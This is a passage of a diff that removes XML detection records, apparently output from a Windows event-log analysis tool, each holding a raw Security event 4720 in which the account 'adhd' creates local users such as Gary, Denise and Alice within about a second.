-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:07.0651414Z'/&gt;&lt;EventRecordID&gt;5041&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Gary&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1166&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Gary&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Gary</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5035</recordid>
-            <time>2020-06-11 22:05:06.959017500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.9590175Z'/&gt;&lt;EventRecordID&gt;5035&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Denise&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1165&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Denise&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Denise</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5029</recordid>
-            <time>2020-06-11 22:05:06.885112000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.8851120Z'/&gt;&lt;EventRecordID&gt;5029&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Beverly&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1164&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Beverly&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Beverly</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5023</recordid>
-            <time>2020-06-11 22:05:06.803632200Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.8036322Z'/&gt;&lt;EventRecordID&gt;5023&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='788'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sean&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1163&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sean&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sean</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5017</recordid>
-            <time>2020-06-11 22:05:06.716087100Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.7160871Z'/&gt;&lt;EventRecordID&gt;5017&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Edward&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1162&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Edward&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Edward</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5011</recordid>
-            <time>2020-06-11 22:05:06.634661500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.6346615Z'/&gt;&lt;EventRecordID&gt;5011&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Nathan&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1161&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Nathan&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Nathan</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>5005</recordid>
-            <time>2020-06-11 22:05:06.542221000Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.5422210Z'/&gt;&lt;EventRecordID&gt;5005&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='8088'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Alice&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1160&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Alice&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Alice</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4999</recordid>
-            <time>2020-06-11 22:05:06.457192700Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.4571927Z'/&gt;&lt;EventRecordID&gt;4999&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Sharon&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1159&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Sharon&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Sharon</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4993</recordid>
-            <time>2020-06-11 22:05:06.372095500Z</time>
-            <channel>Security</channel>
-            <raw>&lt;Event xmlns='http://schemas.microsoft.com/win/2004/08/events/event'&gt;&lt;System&gt;&lt;Provider Name='Microsoft-Windows-Security-Auditing' Guid='{54849625-5478-4994-a5ba-3e3b0328c30d}'/&gt;&lt;EventID&gt;4720&lt;/EventID&gt;&lt;Version&gt;0&lt;/Version&gt;&lt;Level&gt;0&lt;/Level&gt;&lt;Task&gt;13824&lt;/Task&gt;&lt;Opcode&gt;0&lt;/Opcode&gt;&lt;Keywords&gt;0x8020000000000000&lt;/Keywords&gt;&lt;TimeCreated SystemTime='2020-06-11T22:05:06.3720955Z'/&gt;&lt;EventRecordID&gt;4993&lt;/EventRecordID&gt;&lt;Correlation ActivityID='{d0a5cb6e-403a-0001-29cc-a5d03a40d601}'/&gt;&lt;Execution ProcessID='740' ThreadID='792'/&gt;&lt;Channel&gt;Security&lt;/Channel&gt;&lt;Computer&gt;DESKTOP-I1T2G01&lt;/Computer&gt;&lt;Security/&gt;&lt;/System&gt;&lt;EventData&gt;&lt;Data Name='TargetUserName'&gt;Brittany&lt;/Data&gt;&lt;Data Name='TargetDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='TargetSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1158&lt;/Data&gt;&lt;Data Name='SubjectUserSid'&gt;S-1-5-21-4235200151-4210980811-2443358387-1000&lt;/Data&gt;&lt;Data Name='SubjectUserName'&gt;adhd&lt;/Data&gt;&lt;Data Name='SubjectDomainName'&gt;DESKTOP-I1T2G01&lt;/Data&gt;&lt;Data Name='SubjectLogonId'&gt;0x1c5da&lt;/Data&gt;&lt;Data Name='PrivilegeList'&gt;-&lt;/Data&gt;&lt;Data Name='SamAccountName'&gt;Brittany&lt;/Data&gt;&lt;Data Name='DisplayName'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserPrincipalName'&gt;-&lt;/Data&gt;&lt;Data Name='HomeDirectory'&gt;%%1793&lt;/Data&gt;&lt;Data Name='HomePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ScriptPath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='ProfilePath'&gt;%%1793&lt;/Data&gt;&lt;Data Name='UserWorkstations'&gt;%%1793&lt;/Data&gt;&lt;Data Name='PasswordLastSet'&gt;%%1794&lt;/Data&gt;&lt;Data Name='AccountExpires'&gt;%%1794&lt;/Data&gt;&lt;Data Name='PrimaryGroupId'&gt;513&lt;/Data&gt;&lt;Data Name='AllowedToDelegateTo'&gt;-&lt;/Data&gt;&lt;Data Name='OldUacValue'&gt;0x0&lt;/Data&gt;&lt;Data Name='NewUacValue'&gt;0x15&lt;/Data&gt;&lt;Data Name='UserAccountControl'&gt;

-		%%2080

-		%%2082

-		%%2084&lt;/Data&gt;&lt;Data Name='UserParameters'&gt;%%1793&lt;/Data&gt;&lt;Data Name='SidHistory'&gt;-&lt;/Data&gt;&lt;Data Name='LogonHours'&gt;%%1797&lt;/Data&gt;&lt;/EventData&gt;&lt;/Event&gt;</raw>
-            <TargetUserName>Brittany</TargetUserName>
-            <SubjectUserName>adhd</SubjectUserName>
-        </detection>
-        <detection type="Event">
-            <id>4720</id>
-            <recordid>4987</recordid>
-            <time>2020-06-11 22:05:06.281839700Z</time>
-            <channel>Security</channel>
